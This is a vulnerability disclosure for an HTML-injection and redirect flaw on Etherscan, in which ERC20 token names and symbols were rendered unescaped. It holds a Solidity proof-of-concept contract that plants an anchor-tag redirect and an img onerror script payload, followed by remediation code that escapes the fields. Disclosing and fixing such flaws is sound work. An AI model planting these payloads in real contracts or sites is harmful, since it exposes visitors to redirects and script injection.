Etherscan clickjacking vulnerability
Vulnerability URL: (fill in this field for web vulnerabilities)
https://etherscan.io
Brief description: vulnerability explanation, exploitation conditions, impact, etc.
When deploying a token contract that conforms to the ERC20 standard, the symbol and name are user-defined, so an <a> tag can be embedded in them that overrides the label the page would normally render.
When a user visits the page and clicks the contract name, they can be redirected to an arbitrary website.
This requires deploying an ERC20-standard contract and sending one transaction before the contract page is visited.
Proof of vulnerability:
https://ropsten.etherscan.io/address/0x701300f2f2c171c8c7c09e0fa09d6706a4fc7cd6#tokentxns
Exploit code:
    pragma solidity ^0.4.24;

    // Proof-of-concept token from the report: an ERC20-style contract whose
    // name and symbol carry HTML, which the affected page rendered unescaped.
    contract MyTest {
        mapping(address => uint256) balances;
        uint256 public totalSupply;
        mapping (address => mapping (address => uint256)) allowance;
        address public owner;
        string public name;
        string public symbol;
        uint8 public decimals = 18;

        event Transfer(address indexed _from, address indexed _to, uint256 _value);

        // Constructor (0.4.22+ syntax; the original used the deprecated
        // `function MyTest()` form). The markup in name/symbol is the payload.
        constructor() public {
            name = "<a href=http://baidu.com>12321</a>";
            symbol = 'ok<img src=/ onerror=alert(1)> ';
            totalSupply = 100000000000000000000000000000000000;
        }

        // Emits a Transfer event so the explorer indexes the contract as a token
        // (the "one transaction before visiting the page" precondition above).
        function mylog(address arg0, address arg1, uint256 arg2) public {
            emit Transfer(arg0, arg1, arg2);
        }
    }
Remediation:
Filter (escape) the user-supplied name and symbol fields before rendering them.
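The following is an added example of the remediation, not Etherscan's own code: the token name and symbol read from the chain are HTML-escaped before being placed in the page, and an allow-list check flags symbols that carry markup for review. The `renderTokenLabel`, `isPlainSymbol` and `escapeHtml` functions, the `SAMPLE_TOKENS` values (which mirror the strings in the proof-of-concept contract) and the allowed character set are all assumptions of this example.

```javascript
// Added example, not Etherscan's code: render on-chain token metadata safely.
// Two layers are shown: HTML-escaping (always applied), and an allow-list
// check that flags names/symbols carrying markup so they can be reviewed.

const HTML_ESCAPES = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#39;',
};

// Escape the five characters that can change HTML structure or attribute context.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Allow-list: a conservative character set for a token symbol (assumed policy).
function isPlainSymbol(symbol) {
  return /^[A-Za-z0-9 ._-]{1,16}$/.test(symbol);
}

// Build the HTML for a token label from untrusted name/symbol strings.
// Because both fields are escaped, an injected <a> or <img> stays inert text.
function renderTokenLabel(token) {
  const name = escapeHtml(token.name.trim());
  const symbol = escapeHtml(token.symbol.trim());
  return `<span class="token-name">${name}</span> (<span class="token-symbol">${symbol}</span>)`;
}

// Constructed sample values mirroring the report's proof-of-concept contract.
const SAMPLE_TOKENS = [
  { name: '<a href=http://baidu.com>12321</a>', symbol: 'ok<img src=/ onerror=alert(1)> ' },
  { name: 'Plain Token', symbol: 'PLN' },
];

// Render every sample and report whether its symbol would be flagged.
function demo() {
  return SAMPLE_TOKENS.map((t) => ({
    html: renderTokenLabel(t),
    flagged: !isPlainSymbol(t.symbol.trim()),
  }));
}

if (typeof require !== 'undefined' && require.main === module) {
  for (const r of demo()) console.log(r);
}
```

In a real page the same effect is obtained by assigning the name and symbol to an element's `textContent` rather than building HTML strings at all; the string-building form is used here so the escaped output can be inspected directly. The allow-list check is a second, independent signal: escaping alone makes the markup harmless, while the flag lets the operator hide or review tokens whose metadata was clearly crafted.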
————————————————————————————————
After contacting the Etherscan vendor, the vulnerability has now been fixed.